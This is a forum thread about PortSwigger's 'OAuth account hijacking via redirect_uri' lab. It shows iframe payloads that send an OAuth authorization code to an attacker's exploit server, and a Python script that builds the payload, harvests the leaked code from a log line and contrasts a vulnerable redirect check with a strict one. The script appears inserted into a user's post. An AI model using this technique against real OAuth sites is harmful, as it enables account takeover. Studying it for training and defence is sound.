The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Lab: OAuth account hijacking via redirect_uri

Prachi | Last updated: Jan 16, 2023 05:50PM UTC

<iframe src="https://YOUR-LAB-OAUTH-SERVER-ID.web-security-academy.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe>

In this exploit, what are YOUR-LAB-OAUTH-SERVER-ID and YOUR-LAB-CLIENT-ID?

Ben, PortSwigger Agent | Last updated: Jan 16, 2023 06:00PM UTC

Hi Prachi, 'YOUR-LAB-CLIENT-ID' is the URL of your lab instance whereas 'YOUR-LAB-OAUTH-SERVER-ID' is the URL of the OAuth service being used in your lab instance (you should be able to find this by checking your HTTP history and this will start 'https://oauth-').

Prachi | Last updated: Jan 17, 2023 06:53AM UTC

I tried to put my lab instance as the client ID, but I get the error below when I load the iframe by clicking on "View exploit":

Oops! Something went wrong
error: invalid_client
error_description: client is invalid

Prachi | Last updated: Jan 17, 2023 07:19AM UTC

Figured it out:

YOUR-LAB-OAUTH-SERVER: starts with 'https://oauth-', found in the Host header of the GET /auth request
YOUR-LAB-CLIENT-ID: GET /auth?client_id=[....]
YOUR-LAB-ID: lab instance ID
YOUR-EXPLOIT-SERVER-ID: exploit server ID
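The lab's flaw is that the OAuth service accepts whatever redirect_uri the /auth request carries, so an iframe built from the values Prachi lists above sends the victim's authorization code to the exploit server instead of the client application. The following Python is an added illustration, not code from PortSwigger's lab, the oidc-provider library, or any poster in this thread. It builds the attacker's /auth URL and iframe from the same placeholders, models a vulnerable authorization server beside one that enforces an exact match against the client's registered callback, and pulls the leaked code out of a constructed exploit-server access-log line. Every hostname, the client ID, the /oauth-callback path and the log-line format are assumptions.

```python
from urllib.parse import urlencode, urlsplit, parse_qs, quote

# Placeholder values mirroring the thread's templates; not real lab identifiers.
OAUTH_SERVER = "https://oauth-YOUR-LAB-OAUTH-SERVER-ID.oauth-server.net"
CLIENT_ID = "YOUR-LAB-CLIENT-ID"
CLIENT_APP = "https://YOUR-LAB-ID.web-security-academy.net"
# Assumed callback path on the client app; the thread does not state it.
REGISTERED_REDIRECT = CLIENT_APP + "/oauth-callback"
ATTACKER_REDIRECT = "https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net"

# Constructed client registry held by the authorization server.
REGISTERED = {CLIENT_ID: (REGISTERED_REDIRECT,)}


def build_auth_url(redirect_uri, scope="openid profile email"):
    """/auth URL the attacker's iframe points at, with an attacker-chosen
    redirect_uri. quote_via=quote keeps the scope spaces as %20 like the lab."""
    query = urlencode(
        {"client_id": CLIENT_ID, "redirect_uri": redirect_uri,
         "response_type": "code", "scope": scope},
        quote_via=quote,
    )
    return f"{OAUTH_SERVER}/auth?{query}"


def build_iframe(redirect_uri):
    """Payload to host at /exploit on the exploit server."""
    return f'<iframe src="{build_auth_url(redirect_uri)}"></iframe>'


def vulnerable_redirect_check(client_id, redirect_uri):
    """The bug: only checks that the client exists; redirect_uri is never
    compared with anything, so any host can receive the code."""
    return client_id in REGISTERED


def strict_redirect_check(client_id, redirect_uri):
    """The fix: redirect_uri must exactly equal a pre-registered URI. No
    prefix, suffix or substring matching, which are classic bypass points."""
    return redirect_uri in REGISTERED.get(client_id, ())


def simulate_authorize(auth_url, check, code="CONSTRUCTED-CODE"):
    """Model of GET /auth for a victim who is already logged in. Returns the
    Location the browser is redirected to (carrying the authorization code),
    or None if the request is rejected. Assumes redirect_uri has no query."""
    params = parse_qs(urlsplit(auth_url).query)
    client_id = params["client_id"][0]
    redirect_uri = params["redirect_uri"][0]
    if not check(client_id, redirect_uri):
        return None
    return f"{redirect_uri}?{urlencode({'code': code})}"


def code_from_access_log(line):
    """Pull the leaked code from an exploit-server access-log line of the
    constructed form 'GET /?code=... HTTP/1.1'. Returns None if absent."""
    request_target = line.split()[1]
    return parse_qs(urlsplit(request_target).query).get("code", [None])[0]


def callback_url(code):
    """Where the attacker submits the stolen code to be logged in as the
    victim (assumed callback path on the client app)."""
    return f"{REGISTERED_REDIRECT}?{urlencode({'code': code})}"


if __name__ == "__main__":
    print("exploit payload:", build_iframe(ATTACKER_REDIRECT))
    url = build_auth_url(ATTACKER_REDIRECT)
    print("vulnerable server redirects victim to:",
          simulate_authorize(url, vulnerable_redirect_check))
    print("strict server response:", simulate_authorize(url, strict_redirect_check))
    leaked = code_from_access_log("GET /?code=CONSTRUCTED-CODE HTTP/1.1")
    print("code harvested from exploit-server log:", leaked)
    print("attacker logs in via:", callback_url(leaked))
```

Run it as a script to see the full flow printed; the strict check returns None for the attacker's URL while the vulnerable one hands the code to the exploit server. The lab's real /auth endpoint is not called; the point is what the server should compare redirect_uri against.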

Liam, PortSwigger Agent | Last updated: Jan 17, 2023 06:53PM UTC

Thanks for letting us know, Prachi. Please let us know if you need any further assistance.

Wong | Last updated: May 25, 2023 01:18AM UTC

I got this error:

SessionNotFound: invalid_request
    at Provider.getInteraction (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:50:11)
    at Provider.interactionDetails (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:228:27)
    at /home/carlos/oauth/index.js:160:34
    at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)
    at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13)
    at setNoCache (/home/carlos/oauth/index.js:121:5)
    at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)
    at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13)
    at Route.dispatch (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:112:3)
    at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5)

Ben, PortSwigger Agent | Last updated: May 25, 2023 08:01AM UTC

Hi, are you able to provide us with details of the steps you have taken in this lab prior to seeing this error?

Wong | Last updated: May 29, 2023 02:22AM UTC

On step 6: "Go back to the exploit server and create the following iframe at /exploit:"

<iframe src="https://oauth-YOUR-LAB-OAUTH-SERVER-ID.oauth-server.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe>

Wong | Last updated: May 29, 2023 02:23AM UTC

When I click "View exploit", I get this error.

Wong | Last updated: May 29, 2023 02:57AM UTC

Why do I get the exploit code, but all requests return a 500 internal failure?

Ben, PortSwigger Agent | Last updated: May 30, 2023 10:47AM UTC

Hi, what values are you using within the iframe?

Wong | Last updated: Jun 01, 2023 08:04AM UTC

<iframe src="https://oauth-0a1400110305fcc180cd4256020a0083.oauth-server.net/auth?client_id=jhchozeafs9d9ej83rofi&redirect_uri=https://exploit-0a3900b803e5fc9e80a343d001050022.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe>

Ben, PortSwigger Agent | Last updated: Jun 02, 2023 07:20AM UTC